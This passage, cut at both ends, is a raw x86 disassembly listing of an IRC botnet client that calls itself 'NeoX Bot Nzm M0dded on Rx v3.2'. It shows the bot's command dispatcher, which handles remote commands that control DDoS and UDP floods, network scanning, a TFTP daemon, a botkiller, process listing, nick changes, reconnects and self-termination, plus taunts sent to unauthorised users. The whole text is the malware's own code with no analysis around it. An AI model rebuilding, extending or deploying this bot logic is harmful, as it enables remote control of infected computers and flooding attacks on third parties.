jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B8FD: ; CODE XREF: sub_40ABFE+C8D�j
and [ebp+var_8E8], 0
and [ebp+var_5D8], 0
jmp short loc_40B91A
; ---------------------------------------------------------------------------
loc_40B90D: ; CODE XREF: sub_40ABFE:loc_40B94D�j
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_40B91A: ; CODE XREF: sub_40ABFE+D0D�j
cmp [ebp+var_5D8], 1
jnb short loc_40B94F
push [ebp+var_8F0]
mov eax, [ebp+var_5D8]
push off_421D3C[eax*4]
call sub_41078E
pop ecx
pop ecx
test eax, eax
jz short loc_40B94D
mov [ebp+var_8E8], 1
jmp short loc_40B94F
; ---------------------------------------------------------------------------
loc_40B94D: ; CODE XREF: sub_40ABFE+D41�j
jmp short loc_40B90D
; ---------------------------------------------------------------------------
loc_40B94F: ; CODE XREF: sub_40ABFE+D23�j
; sub_40ABFE+D4D�j
cmp [ebp+var_8E8], 0
jnz short loc_40B9C8
push [ebp+var_8F0]
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_B8]
push eax ; char
push offset aNoticeSNiceT_0 ; "NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 14h
lea eax, [ebp+var_B8]
push eax ; char
push offset aNoticeSYouVe_0 ; "NOTICE %s :You've been logged.\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 0Ch
push [ebp+var_8F0]
push [ebp+var_8EC]
push offset dword_4221E4 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B9C8: ; CODE XREF: sub_40ABFE+D58�j
and [ebp+var_5D8], 0
jmp short loc_40B9DE
; ---------------------------------------------------------------------------
loc_40B9D1: ; CODE XREF: sub_40ABFE+E19�j
; sub_40ABFE:loc_40BA8F�j
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_40B9DE: ; CODE XREF: sub_40ABFE+DD1�j
cmp [ebp+var_5D8], 2
jge loc_40BA94
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+lpFileName], 0
jnz short loc_40BA03
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40BA03: ; CODE XREF: sub_40ABFE+DFB�j
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
movsx eax, byte ptr [ecx+eax]
test eax, eax
jz short loc_40BA19
jmp short loc_40B9D1
; ---------------------------------------------------------------------------
loc_40BA19: ; CODE XREF: sub_40ABFE+E17�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str2
push offset aNhg_1 ; "nhg"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40BA8F
push 7Fh ; Count
lea eax, [ebp+var_658]
push eax ; Source
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
add ecx, eax
push ecx ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+var_4], 0
jnz short loc_40BA7A
push 0
push [ebp+var_85C]
push offset dword_422220
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40BA7A: ; CODE XREF: sub_40ABFE+E5C�j
lea eax, [ebp+var_B8]
push eax ; char
push offset dword_422250 ; Format
call sub_4091D3
pop ecx
pop ecx
jmp short loc_40BA94
; ---------------------------------------------------------------------------
loc_40BA8F: ; CODE XREF: sub_40ABFE+E36�j
jmp loc_40B9D1
; ---------------------------------------------------------------------------
loc_40BA94: ; CODE XREF: sub_40ABFE+DE7�j
; sub_40ABFE+E8F�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40BA9C: ; CODE XREF: sub_40ABFE+C06�j
cmp [ebp+var_864], 0
jnz short loc_40BABF
push [ebp+lpFileName] ; Str2
push offset a332_2 ; "332"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40F50F
loc_40BABF: ; CODE XREF: sub_40ABFE+EA5�j
cmp [ebp+arg_28], 0
jnz loc_40F50F
and [ebp+var_5D8], 0
jmp short loc_40BADF
; ---------------------------------------------------------------------------
loc_40BAD2: ; CODE XREF: sub_40ABFE:loc_40BD63�j
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_40BADF: ; CODE XREF: sub_40ABFE+ED2�j
mov eax, [ebp+var_5D8]
cmp eax, dword_421DF0
jge loc_40BD68
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
mov eax, [ebp+var_5D8]
imul eax, 0B8h
add eax, offset byte_42A7C0
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40BD63
push offset asc_422284 ; " :"
push [ebp+Src] ; Str
call _strstr
pop ecx
pop ecx
mov [ebp+var_8F4], eax
cmp [ebp+var_8F4], 0
jnz short loc_40BB45
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40BB45: ; CODE XREF: sub_40ABFE+F3D�j
mov eax, [ebp+var_8F4]
mov cl, byte_421C44
mov [eax+2], cl
mov eax, [ebp+var_8F4]
mov cl, byte_421C44
mov [eax+3], cl
push 9Fh ; Count
mov eax, [ebp+var_5D8]
imul eax, 0B8h
add eax, offset dword_42A7D8
push eax ; Source
mov eax, [ebp+var_8F4]
add eax, 4
push eax ; Dest
call _strncpy
add esp, 0Ch
mov [ebp+var_C0], 0Fh
jmp short loc_40BBA5
; ---------------------------------------------------------------------------
loc_40BB98: ; CODE XREF: sub_40ABFE:loc_40BCC1�j
mov eax, [ebp+var_C0]
dec eax
mov [ebp+var_C0], eax
loc_40BBA5: ; CODE XREF: sub_40ABFE+F98�j
cmp [ebp+var_C0], 0
jle loc_40BCC6
push [ebp+var_C0]
push offset aD ; "$%d-"
lea eax, [ebp+SubStr]
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Str
call _strstr
pop ecx
pop ecx
test eax, eax
jz loc_40BC73
mov eax, [ebp+var_BC]
add eax, [ebp+var_C0]
cmp [ebp+eax*4+lpFileName], 0
jz short loc_40BC73
mov eax, [ebp+var_5D8]
imul eax, 0B8h
add eax, offset byte_42A7C0
push eax ; Str
call _strlen
pop ecx
mov ecx, [ebp+var_2D4]
add ecx, eax
mov [ebp+var_2D4], ecx
cmp [ebp+var_2D4], 0
jz short loc_40BC71
mov eax, [ebp+var_BC]
add eax, [ebp+var_C0]
push [ebp+eax*4+Str2] ; SubStr
push [ebp+var_2D4] ; Str
call _strstr
pop ecx
pop ecx
mov [ebp+Source], eax
cmp [ebp+Source], 0
jz short loc_40BC71
push [ebp+Source] ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_407F48
add esp, 0Ch
loc_40BC71: ; CODE XREF: sub_40ABFE+102A�j
; sub_40ABFE+1059�j
jmp short loc_40BCC1
; ---------------------------------------------------------------------------
loc_40BC73: ; CODE XREF: sub_40ABFE+FE1�j
; sub_40ABFE+FFB�j
mov eax, [ebp+var_BC]
add eax, [ebp+var_C0]
cmp [ebp+eax*4+lpFileName], 0
jnz short loc_40BCC1
push 2 ; Count
lea eax, [ebp+SubStr]
push eax ; Source
lea eax, [ebp+var_860]
push eax ; Dest
call _strncpy
add esp, 0Ch
and [ebp+var_85E], 0
lea eax, [ebp+var_860]
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_407F48
add esp, 0Ch
loc_40BCC1: ; CODE XREF: sub_40ABFE:loc_40BC71�j
; sub_40ABFE+1089�j
jmp loc_40BB98
; ---------------------------------------------------------------------------
loc_40BCC6: ; CODE XREF: sub_40ABFE+FAE�j
mov [ebp+var_C0], 10h
jmp short loc_40BCDF
; ---------------------------------------------------------------------------
loc_40BCD2: ; CODE XREF: sub_40ABFE:loc_40BD52�j
mov eax, [ebp+var_C0]
dec eax
mov [ebp+var_C0], eax
loc_40BCDF: ; CODE XREF: sub_40ABFE+10D2�j
cmp [ebp+var_C0], 0
jle short loc_40BD57
push [ebp+var_C0]
push offset aD_0 ; "$%d"
lea eax, [ebp+SubStr]
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Str
call _strstr
pop ecx
pop ecx
test eax, eax
jz short loc_40BD52
mov eax, [ebp+var_BC]
add eax, [ebp+var_C0]
cmp [ebp+eax*4+Str2], 0
jz short loc_40BD52
mov eax, [ebp+var_BC]
add eax, [ebp+var_C0]
push [ebp+eax*4+Str2] ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_407F48
add esp, 0Ch
loc_40BD52: ; CODE XREF: sub_40ABFE+1117�j
; sub_40ABFE+112D�j
jmp loc_40BCD2
; ---------------------------------------------------------------------------
loc_40BD57: ; CODE XREF: sub_40ABFE+10E8�j
mov [ebp+var_C4], 1
jmp short loc_40BD68
; ---------------------------------------------------------------------------
loc_40BD63: ; CODE XREF: sub_40ABFE+F1B�j
jmp loc_40BAD2
; ---------------------------------------------------------------------------
loc_40BD68: ; CODE XREF: sub_40ABFE+EED�j
; sub_40ABFE+1163�j
mov eax, [ebp+var_BC]
mov eax, [ebp+eax*4+Str2]
movsx eax, byte ptr [eax]
movsx ecx, byte_421C44
cmp eax, ecx
jz short loc_40BD90
cmp [ebp+var_C4], 0
jz loc_40BFF2
loc_40BD90: ; CODE XREF: sub_40ABFE+1183�j
push [ebp+Dest] ; Source
push offset aMe_0 ; "$me"
push [ebp+Src] ; Src
call sub_407F48
add esp, 0Ch
lea eax, [ebp+var_B8]
push eax ; Source
push offset aUser_0 ; "$user"
push [ebp+Src] ; Src
call sub_407F48
add esp, 0Ch
push dword ptr [ebp+var_98] ; Source
push offset aChan ; "$chan"
push [ebp+Src] ; Src
call sub_407F48
add esp, 0Ch
push 0 ; Str1
push 0 ; int
lea eax, [ebp+SubStr]
push eax ; Dest
call sub_40FD9A
add esp, 0Ch
push eax ; Source
push offset aRndnick ; "$rndnick"
push [ebp+Src] ; Src
call sub_407F48
add esp, 0Ch
push [ebp+arg_14] ; Source
push offset aServer ; "$server"
push [ebp+Src] ; Src
call sub_407F48
add esp, 0Ch
loc_40BE07: ; CODE XREF: sub_40ABFE+1330�j
push offset aChr ; "$chr("
push [ebp+Src] ; Str
call _strstr
pop ecx
pop ecx
test eax, eax
jz loc_40BF33
push offset aChr_0 ; "$chr("
push [ebp+Src] ; Str
call _strstr
pop ecx
pop ecx
mov [ebp+var_8FC], eax
push 4 ; Count
mov eax, [ebp+var_8FC]
add eax, 5
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; Dest
call _strncpy
add esp, 0Ch
push offset asc_4222CC ; ")"
lea eax, [ebp+SubStr]
push eax ; Str
call _strtok
pop ecx
pop ecx
movsx eax, [ebp+SubStr]
cmp eax, 30h
jl short loc_40BE79
movsx eax, [ebp+SubStr]
cmp eax, 39h
jle short loc_40BE8F
loc_40BE79: ; CODE XREF: sub_40ABFE+126D�j
push 3 ; Count
push offset a63 ; "63"
lea eax, [ebp+SubStr]
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_40BE8F: ; CODE XREF: sub_40ABFE+1279�j
lea eax, [ebp+SubStr]
push eax ; Str
call _atoi
pop ecx
test eax, eax
jle short loc_40BEB5
lea eax, [ebp+SubStr]
push eax ; Str
call _atoi
pop ecx
mov [ebp+var_860], al
jmp short loc_40BEC9
; ---------------------------------------------------------------------------
loc_40BEB5: ; CODE XREF: sub_40ABFE+12A0�j
call _rand
cdq
push 60h
pop ecx
idiv ecx
add edx, 20h
mov [ebp+var_860], dl
loc_40BEC9: ; CODE XREF: sub_40ABFE+12B5�j
and [ebp+var_85F], 0
lea eax, [ebp+SubStr]
push eax ; Str
call _strlen
pop ecx
mov [ebp+var_C0], eax
push 0Ch ; Size
push 0 ; Val
lea eax, [ebp+SubStr]
push eax ; Dst
call _memset
add esp, 0Ch
mov eax, [ebp+var_C0]
add eax, 6
push eax ; Count
push [ebp+var_8FC] ; Source
lea eax, [ebp+SubStr]
push eax ; Dest
call _strncpy
add esp, 0Ch
lea eax, [ebp+var_860]
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_407F48
add esp, 0Ch
jmp loc_40BE07
; ---------------------------------------------------------------------------
loc_40BF33: ; CODE XREF: sub_40ABFE+121A�j
push 1FFh ; Count
push [ebp+Src] ; Source
lea eax, [ebp+var_2D0]
push eax ; Dest
call _strncpy
add esp, 0Ch
push 1FFh ; Count
lea eax, [ebp+var_2D0]
push eax ; Source
lea eax, [ebp+var_5D4]
push eax ; Dest
call _strncpy
add esp, 0Ch
push offset asc_4222D4 ; " "
lea eax, [ebp+var_5D4]
push eax ; Str
call _strtok
pop ecx
pop ecx
mov [ebp+Str2], eax
mov [ebp+var_5D8], 1
jmp short loc_40BF97
; ---------------------------------------------------------------------------
loc_40BF8A: ; CODE XREF: sub_40ABFE+13BD�j
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_40BF97: ; CODE XREF: sub_40ABFE+138A�j
cmp [ebp+var_5D8], 20h
jge short loc_40BFBD
push offset asc_4222D8 ; " "
push 0 ; Str
call _strtok
pop ecx
pop ecx
mov ecx, [ebp+var_5D8]
mov [ebp+ecx*4+Str2], eax
jmp short loc_40BF8A
; ---------------------------------------------------------------------------
loc_40BFBD: ; CODE XREF: sub_40ABFE+13A0�j
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+Str2], 0
jnz short loc_40BFD5
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40BFD5: ; CODE XREF: sub_40ABFE+13CD�j
mov eax, [ebp+var_BC]
mov eax, [ebp+eax*4+Str2]
add eax, 3
mov ecx, [ebp+var_BC]
mov [ebp+ecx*4+Str2], eax
loc_40BFF2: ; CODE XREF: sub_40ABFE+118C�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_rndnick ; "irc.rndnick"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40C02C
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aRn ; "rn"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C077
loc_40C02C: ; CODE XREF: sub_40ABFE+140F�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str1
push dword_421C4C ; int
lea eax, [ebp+var_20]
push eax ; Dest
call sub_40FD9A
add esp, 0Ch
lea eax, [ebp+var_20]
push eax ; char
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 0Ch
lea eax, [ebp+var_20]
push eax ; char
push offset dword_4222F8 ; Format
call sub_4091D3
pop ecx
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C077: ; CODE XREF: sub_40ABFE+142C�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_die ; "irc.die"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40C0B1
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_di ; "irc.di"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C0D9
loc_40C0B1: ; CODE XREF: sub_40ABFE+1494�j
push [ebp+lpFileName] ; Str2
push offset a332_0 ; "332"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40C0D4
call sub_41050C
push 0 ; uExitCode
call ds:ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
loc_40C0D4: ; CODE XREF: sub_40ABFE+14C7�j
jmp loc_40EAE8
; ---------------------------------------------------------------------------
loc_40C0D9: ; CODE XREF: sub_40ABFE+14B1�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_logout ; "irc.logout"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40C117
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aLo ; "lo"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40C282
loc_40C117: ; CODE XREF: sub_40ABFE+14F6�j
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+lpFileName], 0
jz loc_40C1D9
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
call _atoi
pop ecx
mov [ebp+var_5D8], eax
cmp [ebp+var_5D8], 0
jl short loc_40C1BD
cmp [ebp+var_5D8], 2
jge short loc_40C1BD
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
movsx eax, byte ptr [ecx+eax]
test eax, eax
jz short loc_40C1A1
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
lea eax, [ecx+eax+1]
push eax
push offset dword_422350 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
and byte ptr [ecx+eax], 0
jmp short loc_40C1BB
; ---------------------------------------------------------------------------
loc_40C1A1: ; CODE XREF: sub_40ABFE+156A�j
push [ebp+var_5D8]
push offset dword_422380 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40C1BB: ; CODE XREF: sub_40ABFE+15A1�j
jmp short loc_40C1D7
; ---------------------------------------------------------------------------
loc_40C1BD: ; CODE XREF: sub_40ABFE+154D�j
; sub_40ABFE+1556�j
push [ebp+var_5D8]
push offset dword_4223BC ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40C1D7: ; CODE XREF: sub_40ABFE:loc_40C1BB�j
jmp short loc_40C247
; ---------------------------------------------------------------------------
loc_40C1D9: ; CODE XREF: sub_40ABFE+1527�j
and [ebp+var_5D8], 0
jmp short loc_40C1EF
; ---------------------------------------------------------------------------
loc_40C1E2: ; CODE XREF: sub_40ABFE:loc_40C245�j
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_40C1EF: ; CODE XREF: sub_40ABFE+15E2�j
cmp [ebp+var_5D8], 2
jge short loc_40C247
push [ebp+Str2] ; Str2
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
add ecx, eax
push ecx ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C245
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
and byte ptr [ecx+eax], 0
lea eax, [ebp+var_B8]
push eax
push offset dword_4223F8 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_40C247
; ---------------------------------------------------------------------------
loc_40C245: ; CODE XREF: sub_40ABFE+1618�j
jmp short loc_40C1E2
; ---------------------------------------------------------------------------
loc_40C247: ; CODE XREF: sub_40ABFE:loc_40C1D7�j
; sub_40ABFE+15F8�j ...
cmp [ebp+var_4], 0
jnz short loc_40C26D
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40C26D: ; CODE XREF: sub_40ABFE+164D�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C282: ; CODE XREF: sub_40ABFE+1513�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_version ; "irc.version"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40C2BC
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aVer ; "ver"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C310
loc_40C2BC: ; CODE XREF: sub_40ABFE+169F�j
push offset aNeoxBotNzmM0dd ; "NeoX Bot Nzm M0dded on Rx v3.2"
push offset dword_422438 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_4], 0
jnz short loc_40C2FB
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40C2FB: ; CODE XREF: sub_40ABFE+16DB�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C310: ; CODE XREF: sub_40ABFE+16BC�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aLog_off ; "log.off"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C368
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
push 1Dh ; int
push offset aLogList ; "Log list"
push offset dword_42246C ; int
push [ebp+var_4] ; int
push [ebp+var_85C] ; int
push dword ptr [ebp+var_98] ; int
push [ebp+s] ; int
call sub_410663
add esp, 20h
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C368: ; CODE XREF: sub_40ABFE+172D�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aDdos_off ; "ddos.off"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C3C0
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
push 0Ah ; int
push offset aDdosFlood ; "DDoS flood"
push offset dword_422490 ; int
push [ebp+var_4] ; int
push [ebp+var_85C] ; int
push dword ptr [ebp+var_98] ; int
push [ebp+s] ; int
call sub_410663
add esp, 20h
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C3C0: ; CODE XREF: sub_40ABFE+1785�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aDdos_udp_off ; "ddos.udp.off"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C418
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
push 0Fh ; int
push offset aUdpFlood ; "UDP flood"
push offset dword_4224B8 ; int
push [ebp+var_4] ; int
push [ebp+var_85C] ; int
push dword ptr [ebp+var_98] ; int
push [ebp+s] ; int
call sub_410663
add esp, 20h
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C418: ; CODE XREF: sub_40ABFE+17DD�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aDaemon_tftp_of ; "daemon.tftp.off"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C470
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
push 4 ; int
push offset aServer_0 ; "Server"
push offset dword_4224DC ; int
push [ebp+var_4] ; int
push [ebp+var_85C] ; int
push dword ptr [ebp+var_98] ; int
push [ebp+s] ; int
call sub_410663
add esp, 20h
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C470: ; CODE XREF: sub_40ABFE+1835�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_procs_off ; "com.procs.off"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40C4AA
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aCom_ps_off ; "com.ps.off"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C4E5
loc_40C4AA: ; CODE XREF: sub_40ABFE+188D�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
push 1Fh ; int
push offset aProcessList ; "Process list"
push offset dword_422514 ; int
push [ebp+var_4] ; int
push [ebp+var_85C] ; int
push dword ptr [ebp+var_98] ; int
push [ebp+s] ; int
call sub_410663
add esp, 20h
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C4E5: ; CODE XREF: sub_40ABFE+18AA�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aBotkiller_off ; "botkiller.off"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40C51F
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aBk_off ; "bk.off"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C55A
loc_40C51F: ; CODE XREF: sub_40ABFE+1902�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
push 21h ; int
push offset aBotkiller ; "Botkiller"
push offset aBotkiller_0 ; "BOTKILLER"
push [ebp+var_4] ; int
push [ebp+var_85C] ; int
push dword ptr [ebp+var_98] ; int
push [ebp+s] ; int
call sub_410663
add esp, 20h
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C55A: ; CODE XREF: sub_40ABFE+191F�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aLockdown_stop ; "lockdown.stop"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C5B2
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
push 1Ah ; int
push offset aSecure ; "Secure"
push offset dword_422568 ; int
push [ebp+var_4] ; int
push [ebp+var_85C] ; int
push dword ptr [ebp+var_98] ; int
push [ebp+s] ; int
call sub_410663
add esp, 20h
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C5B2: ; CODE XREF: sub_40ABFE+1977�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aScanstop ; "scanstop"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C60A
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
push 8 ; int
push offset aScan ; "Scan"
push offset aScan_0 ; "[SCAN]"
push [ebp+var_4] ; int
push [ebp+var_85C] ; int
push dword ptr [ebp+var_98] ; int
push [ebp+s] ; int
call sub_410663
add esp, 20h
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C60A: ; CODE XREF: sub_40ABFE+19CF�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aStats ; "stats"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40C644
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aSt ; "st"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C663
loc_40C644: ; CODE XREF: sub_40ABFE+1A27�j
push [ebp+var_85C]
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_404D97
add esp, 0Ch
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C663: ; CODE XREF: sub_40ABFE+1A44�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_reconnect ; "irc.reconnect"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40C69D
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_r ; "irc.r"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C6BE
loc_40C69D: ; CODE XREF: sub_40ABFE+1A80�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+s] ; int
call sub_40A03C
pop ecx
pop ecx
push offset dword_4225D0
call sub_40913D
pop ecx
xor eax, eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C6BE: ; CODE XREF: sub_40ABFE+1A9D�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_disconnect ; "irc.disconnect"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40C6F8
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_d ; "irc.d"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C71A
loc_40C6F8: ; CODE XREF: sub_40ABFE+1ADB�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+s] ; int
call sub_40A03C
pop ecx
pop ecx
push offset dword_422628
call sub_40913D
pop ecx
or eax, 0FFFFFFFFh
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40C71A: ; CODE XREF: sub_40ABFE+1AF8�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_quit ; "irc.quit"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40C754
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_q ; "irc.q"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40C7C5
loc_40C754: ; CODE XREF: sub_40ABFE+1B37�j
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+lpFileName], 0
jz short loc_40C7AE
cmp [ebp+var_2D4], 0
jz short loc_40C7AC
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; SubStr
push [ebp+var_2D4] ; Str
call _strstr
pop ecx
pop ecx
mov dword ptr [ebp+var_900], eax
cmp dword ptr [ebp+var_900], 0
jz short loc_40C7AC
push dword ptr [ebp+var_900] ; char
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 0Ch
loc_40C7AC: ; CODE XREF: sub_40ABFE+1B6D�j
; sub_40ABFE+1B96�j
jmp short loc_40C7BD
; ---------------------------------------------------------------------------
loc_40C7AE: ; CODE XREF: sub_40ABFE+1B64�j
